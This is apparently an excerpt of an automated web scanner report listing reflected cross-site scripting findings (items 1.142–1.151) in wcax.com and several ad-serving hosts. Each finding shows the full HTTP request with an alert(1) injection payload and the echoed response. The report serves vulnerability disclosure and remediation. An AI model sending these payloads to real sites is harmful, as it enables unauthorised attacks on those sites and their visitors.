Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352293178:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 26061
Cache-Control: private, max-age=300
Expires: Sat, 09 Apr 2011 12:39:03 GMT
Date: Sat, 09 Apr 2011 12:34:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 26061

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX Vermo
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','http://www.vermontopia.com/event/?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.142. http://www.wcax.com/global/interface/httprequest/hrproxy.asp [url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wcax.com
Path:   /global/interface/httprequest/hrproxy.asp

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c6a9e<a>86d1ec594e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /global/interface/httprequest/hrproxy.asp?url=http%3A%2F%2Fwp.myweather.net%2Fwxdata%2Ffiveday.asp%3Fpub%3Dwdnw%26s%3Dkbtvc6a9e<a>86d1ec594e&rand=98263 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS54
P3P: CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml; charset=utf-8
ntCoent-Length: 93
Cache-Control: private, max-age=277
Date: Sat, 09 Apr 2011 12:34:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 93

<?xml version="1.0"?>
<!-- 200 - fiveday: KBTVC6A9E<A>86D1EC594E not found
--><datamissing/>

1.143. http://www.wcax.com/global/link.asp [function parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the function request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38f44'-alert(1)-'4014e68a00c was submitted in the function parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS07
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=843
Date: Sat, 09 Apr 2011 12:38:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile38f44'-alert(1)-'4014e68a00c&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.144. http://www.wcax.com/global/link.asp [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the mode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a495'-alert(1)-'4b87acb98b2 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25813
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:38:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25813

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create3a495'-alert(1)-'4b87acb98b2&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.145. http://www.wcax.com/global/link.asp [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fdd3'-alert(1)-'cdf0dafd5c5 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25809
Cache-Control: private, max-age=886
Date: Sat, 09 Apr 2011 12:38:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25809

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
<script type="text/javascript">
$('#Frame1').attr('src','/global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D3988238fdd3'-alert(1)-'cdf0dafd5c5&referrerDomain=www.wcax.com');
</script>
...[SNIP]...

1.146. http://y.cdn.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7246"><script>alert(1)</script>f269b65bb7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1 HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:22 GMT
Expires: Mon, 11 Apr 2011 17:41:22 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.21
Set-Cookie: __tuid=2298699369738581740; expires=Sat, 09-Apr-2016 17:41:22 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543682.054165088407; expires=Tue, 12-Apr-2011 17:41:22 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
t%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,&e7246"><script>alert(1)</script>f269b65bb7d=1http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...

1.147. http://y.cdn.adblade.com/imps.php [tpUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The value of the tpUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70367"><script>alert(1)</script>fea2373bb9f was submitted in the tpUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9f HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:21 GMT
Expires: Mon, 11 Apr 2011 17:41:21 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.26
Set-Cookie: __tuid=2298699369259597370; expires=Sat, 09-Apr-2016 17:41:21 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543681.832680212853; expires=Tue, 12-Apr-2011 17:41:21 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,70367"><script>alert(1)</script>fea2373bb9fhttp://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
...[SNIP]...

1.148. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5bb'-alert(1)-'7b2cca80406 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=6b5bb'-alert(1)-'7b2cca80406

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:02:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:02:16 GMT
Content-Length: 425

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970&referrer=http://www.google.com/search%3Fhl=en%26q=6b5bb'-alert(1)-'7b2cca80406&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970%26referrer%3Dhttp%3A%2F%2Fwww.foxnews.com%2Fpolitics%2F
...[SNIP]...

1.149. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6e43"-alert(1)-"154bb4aae5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:41:24 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA2CE391FB899591A7EDF0BA5B76934F; Path=/
Connection: keep-alive
Content-Length: 8305


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=d6e43"-alert(1)-"154bb4aae5d",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=5079&campId=3993",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.de
...[SNIP]...

1.150. http://bh.contextweb.com/bh/sync/admeld [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be1f9'-alert(1)-'3ba314679b8 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:51 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 218
Date: Mon, 11 Apr 2011 16:31:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8&_segment=2%7CwOEFmQuIafISbe1f9'-alert(1)-'3ba314679b8%7C"/>
...[SNIP]...

1.151. http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.foxnews/tier2_031010

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a52cd"%3balert(1)//cff7d8c4d5c was submitted in the cli cookie. This input was echoed as a52cd";alert(1)//cff7d8c4d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878;env=ifr;ord1=280882;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582ba52cd"%3balert(1)//cff7d8c4d5c; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:21 GMT
Connection: close
